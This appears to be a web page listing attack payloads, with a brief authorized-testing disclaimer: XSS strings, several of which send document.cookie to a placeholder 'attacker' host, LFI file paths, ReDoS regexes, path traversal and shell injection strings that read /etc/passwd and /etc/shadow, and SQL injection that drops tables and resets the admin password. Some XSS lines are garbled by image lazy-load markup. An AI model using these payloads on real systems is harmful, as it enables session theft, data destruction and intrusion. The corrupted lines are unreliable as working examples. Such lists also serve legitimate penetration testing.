List of Pay Loads
Note that using these payloads without proper authorization and permission is illegal and unethical. It is important to only use them for legitimate testing purposes and with the owner’s consent.
XSS Payloads
<script>alert("XSS");</script>
<img src="x" data-lazy-src="http://x?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class=" jetpack-lazy-image"><noscript><img data-lazy-fallback="1" src=x onerror=alert('XSS') /></noscript>
<script>prompt(document.cookie)</script>
<svg/onload=alert(document.cookie)>
<iframe src="javascript:alert('XSS');"></iframe>
<img decoding="async" src="alert('XSS');" data-lazy-src="http://alert('XSS');?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class=" jetpack-lazy-image"><noscript><img data-lazy-fallback="1" decoding="async" src="javascript:alert('XSS');" /></noscript>
<script>alert(String.fromCharCode(88,83,83))</script>
<script>alert(String.fromCharCode(88,88,83))</script>
<img decoding="async" src="alert(String.fromCharCode(88,83,83));" data-lazy-src="http://alert(String.fromCharCode(88,83,83));?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class=" jetpack-lazy-image"><noscript><img data-lazy-fallback="1" decoding="async" src="javascript:alert(String.fromCharCode(88,83,83));" /></noscript>
<svg><script>alert(1)</script></svg>
<object data="javascript:alert('XSS');" type="image/gif"></object>
<b onmouseover=alert('XSS')>mouseover me!</b>
<body onload=alert('XSS')>
<iframe src="javascript:alert('XSS');" />
<script>confirm(document.cookie)</script>
<svg><script>fetch("//example.com/?cookie=" + document.cookie);</script></svg>
<script>document.location='http://attacker/?cookie='+document.cookie</script>
<img src="x" onerror="location.href='http://attacker/?cookie='+document.cookie;" data-lazy-src="http://x?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class=" jetpack-lazy-image"><noscript><img data-lazy-fallback="1" src=x onerror="location.href='http://attacker/?cookie='+document.cookie;" /></noscript>
<script>new Image().src="http://attacker/?cookie="+document.cookie;</script>
<a href="javascript:alert('XSS')">Click me!</a>
LFI Payloads:
/etc/passwd
/proc/self/environ
/proc/self/cmdline
/proc/self/maps
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/version
/proc/cpuinfo
/proc/mounts
/proc/net/tcp
/proc/net/udp
/proc/self/status
/proc/self/mem
/proc/self/cwd
/proc/self/smaps
/proc/self/fd/3
/etc/httpd/logs/access_log
/var/log/httpd/access_log
/var/log/httpd/error_logReDoS Payloads:
(a+)+
(a|aa)+
(a|a?)*
(a*)*
(a|a{0,2})*
(a*){1,5}
(a{1,2}){1,2}
(a|a ){10}b
(a|aa){1,10}b
((a|aa){1,10}b){1,10}
(a+)+
(a|aA)+
(a|aA?)*
(aA*)*
(a|a{0,2}A)*
(aA*){1,5}
(a{1,2}A){1,2}
(a|aA ){10}b
(a|aaA){1,10}b
((a|aaA){1,10}b){1,10}Recursive Payload Injection (REC):
{{'a'*1000000}}
../
.../
/./
/../
%00
./
.//
..%2F
..%2F..%2F
../../../../../../../../../etc/passwd
../../../../../../../../../boot.ini
.../.../.../.../.../.../etc/passwd
.../.../.../.../.../.../boot.ini
'; cat /etc/passwd;
'; cat /etc/shadow;
; ls -la;
; echo 'you have been hacked' > hacked.txt
"; ls -la;
; cat /etc/passwd
'; cat /etc/passwd
"); cat /etc/passwd
'); cat /etc/passwd
(){ :; }; echo 'you have been hacked'`
((%0Aecho%0A))%0Ayou have been hackedPayloads for SQL Injection:
' or 1=1--
1'; DROP TABLE users--
1'; UPDATE users SET password='hacked' WHERE username='admin'--
'; SELECT * FROM users--
1'; SELECT @@version--
1'; SELECT database()--
1'; SELECT user()--
1'; SELECT current_user--
1'; SELECT schema_name FROM information_schema.schemata--
1'; SELECT table_name FROM information_schema.tables WHERE table_schema='public'--
1'; SELECT column_name FROM information_schema.columns WHERE table_name='users'--
1'; SELECT * FROM users WHERE username='admin' AND password='password'--
1' UNION SELECT 1, 'hacked', 'admin@example.com', 'hacked'--
1'; CREATE TABLE hacked (id INT, name VARCHAR(255))--
1'; INSERT INTO hacked (id, name) VALUES (1, 'hacked')--
1'; UPDATE users SET password='hacked' WHERE username='admin'--
1'; ALTER TABLE users ADD COLUMN hacked VARCHAR(255)--
1'; DROP INDEX users_username_idx--
1'; TRUNCATE TABLE users--
1'; SELECT LOAD_FILE('/etc/passwd')--
1'; SELECT * FROM users INTO OUTFILE '/var/www/html/hacked.txt'--
1'; SELECT * FROM information_schema.tables WHERE table_schema=database()--
1'; SELECT * FROM information_schema.columns WHERE table_name='users'--
1'; SELECT * FROM users WHERE password LIKE '%pass%'--
1'; SELECT * FROM users WHERE username='admin' AND password LIKE 'pass%'--